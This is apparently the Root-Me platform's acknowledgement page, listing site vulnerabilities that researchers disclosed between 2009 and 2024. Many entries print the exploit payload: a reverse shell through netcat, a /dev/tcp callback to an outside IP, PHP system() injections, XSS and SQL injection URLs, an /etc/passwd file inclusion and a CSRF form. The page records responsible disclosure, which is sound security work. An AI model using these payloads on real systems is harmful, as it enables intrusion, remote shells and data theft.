Discovered Weaknesses
Like any information system, the website has had its share of weaknesses discovered.
26/08/2024 Mika
has identified an OS Command Injection vulnerability that allows a user to gain root access to challenge servers when deploying a challenge with a malicious flag.
RM{' && nc.traditional 51.75.X.X 4444 -e /bin/bash #}
07/02/2024 Nishacid
Has identified a stored XSS vulnerability in translations, allowing a member of the association to modify any of the site’s translations with JavaScript code by using:
<img/src/onerror=confirm(document.domain)>
22/11/2023 Laluka
Has identified a stored XSS (through file upload) to RCE via code injection on the mediabox configuration. PHP code is reflected (json_dump) and then evaluated; the targeted account must be webmestre.
const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');
const formData = new FormData(form);
formData.append("lity[<?php echo system(base64_decode('aWQ='));?>]", 42);
14/07/2023 Elweth
Detected a vulnerability in the version of Chrome Headless that bots use for Web-Client challenges. The version in question was vulnerable to CVE-2021-21224, which could lead to code execution in the bot’s environment.
27/08/2022 Laluka
Has identified a vulnerability where changing the status of the site’s content (doc, challenge, post, ...) to a higher level (e.g. from draft to evaluation or from trash to writing) triggers an email to be sent to the challenge author and/or webmaster. Some variables, such as the title and content, are not properly encoded or escaped before being passed to the eval function which renders the email. This allowed a Blind-RCE with a payload such as <?php system("bash -c 'id > /dev/tcp/42.42.42.42/4242'"); ?> in the title or content of the article.
21/07/2022 Abyss Watcher & SpawnZii
have identified a remote code execution (RCE) vulnerability allowing a privileged user to execute PHP code:
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG9DIjt9'"><?php system('id;hostname;whoami');?>
11/07/2022 Abyss Watcher
identified a stored XSS vulnerability exploitable with an iframe hosted on the RM domain:
<iframe src="https://www.root-me.org/IMG/html/xss.html">
17/03/2022 Mizu
identified a stored XSS vulnerability exploitable with an iframe hosted on a malicious domain whose name starts with www.root-me.org:
<iframe src="https://www.root-me.org.evil.domain/">
23/11/2021 zLade
identified a vulnerability allowing a member of the association to elevate his role to administrator simply by using the private interface of SPIP.
01/10/2021 Podalirius
identified a vulnerability allowing unrestricted access to documents attached to solutions.
15/05/2020 Laluka
identified multiple vulnerabilities: 3 reflected XSS, 2 SQLi and 1 RCE:
https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E
12/01/2020 NonStandardModel
identified an XSS vulnerability in the name of the file imported on http://repository.root-me.org/
04/06/2019 warlock
identified an XSS vulnerability. This one required user interaction in the chatbox (a click on the previous page).
http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>
04/06/2019 warlock
has identified a vulnerability allowing an unprivileged user to kill the database on the challenge01 server, which hosts several challenges, by saturating memory in a particular way so as to kill a process of their choice. This then allowed another binary to be started in its place, listening on the same port, via a race condition.
16/11/2018 Hacqueen
identified a vulnerability allowing users of the store to be trapped through an iframe pointing at a Spreadshirt domain controlled by the attacker (e.g. spreadshirt.ro); the lang parameter was not filtered correctly.
12/04/2018 DrStache & urandom
identified a stored XSS vulnerability in the OSM map of the CTFATD rooms by injecting the following payload into the user’s bio (https://www.root-me.org/?page=preferences&lang=en):
<svg onload=console.log(document.domain)>
12/10/2015 ST4HLKR1EG
has identified an "Insecure Direct Object Reference" vulnerability allowing any private message to be read:
page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]
03/2015 WtF
has identified a remote code execution (RCE) vulnerability in a challenge being evaluated on the production server, allowing access to the file system over ssh and execution of commands.
03/2015 WtF
has identified an arbitrary file inclusion vulnerability (LFI) in the Path Truncation web-server challenge that allowed reading files belonging to other challenges.
15/06/2013 LouTerrailloune
has identified a PHP code injection vulnerability on the "code - decode" page:
Text to decode in base64:
PD9waHAgcGhwaW5mbygpOyA/Pg==
06/11/2012 jimee
found several stored XSS in the user profile management:
<script>[code javascript/vbscript]</script>
20/03/2012 jimee
found an LFI in a challenge:
http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php
23/10/2011 courte66
found a reflected XSS in the "encode - decode" page:
Text to decode in base64:
Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=
02/10/2011 Hypnoze
found an insecure direct object reference which led to unauthorized access to all PMs:
http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]
11/07/2011 Armel
found a stored XSS on the chatbox.
<iframe src="javascript:[code javascript]" />
18/07/2011 g0uZ
found a PHP code injection vulnerability in the "online tools: nmap" page.
Host to scan in -sV mode:
--version-trace -p8888 [IP server attacker]
Service listening on the attacker's server:
i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done
30/06/2011 elyfean
found a CSRF on the chatbox:
<form id="form" action="http://www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>
15/02/2011 EsSandre
found an LFI:
http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd
02/02/2011 hello
found several stored XSS in the PM system:
<script>[code javascript/vbscript]</script>
02/12/2009 real
found a code injection vulnerability:
http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'